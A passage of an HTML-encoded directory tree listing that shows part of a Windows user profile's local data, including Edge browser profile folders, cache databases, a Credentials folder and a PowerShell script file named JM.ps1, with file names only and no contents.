&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ActivitiesCache.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ActivitiesCache.db-shm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ActivitiesCache.db-wal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; L.Werni.cdp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; L.Werni.cdpresource
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; D3DSCache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; 45a5e5b635b28e7a
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; IconCache.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; JM.ps1
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CLR_v4.0
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ngen.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CLR_v4.0_32
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ngen.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Credentials
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DFBE70A7E5CC19A398EBF1B96859CE5D
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Edge
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; User Data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; BrowserMetrics
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; BrowserMetrics-689FA595-A90.pma
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Crashpad
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; metadata
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; settings.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; throttle_store.dat
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Default
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ClientCertificates
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Code Cache
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; js
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; index-dir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; the-real-index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; wasm
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; index-dir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;         &#9492;&#9472;&#9472; the-real-index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; commerce_subscription_db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; discount_infos_db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; discounts_db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EdgeCoupons
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; coupons_data.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; 000003.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; CURRENT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; MANIFEST-000001
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EdgeEDrop
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EdgeEDropSQLite.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; EdgeEDropSQLite.db-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EdgeHubAppUsage
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EdgeHubAppUsageSQLite.db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; EdgeHubAppUsageSQLite.db-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Edge Profile.ico
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EdgePushStorageWithConnectTokenAndKey
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG.old
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Extension Rules
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 000003.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CURRENT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MANIFEST-000001
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Extension Scripts
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 000003.log
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CURRENT
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MANIFEST-000001
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Favicons
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Favicons-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; History
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; History-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Local Storage
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; leveldb
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Login Data
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Login Data-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Network
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NetworkDataMigrated
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Nurturing
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; campaign_history
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; campaign_history-journal
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; parcel_tracking_db
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PersistentOriginTrials
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LOCK
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LOG
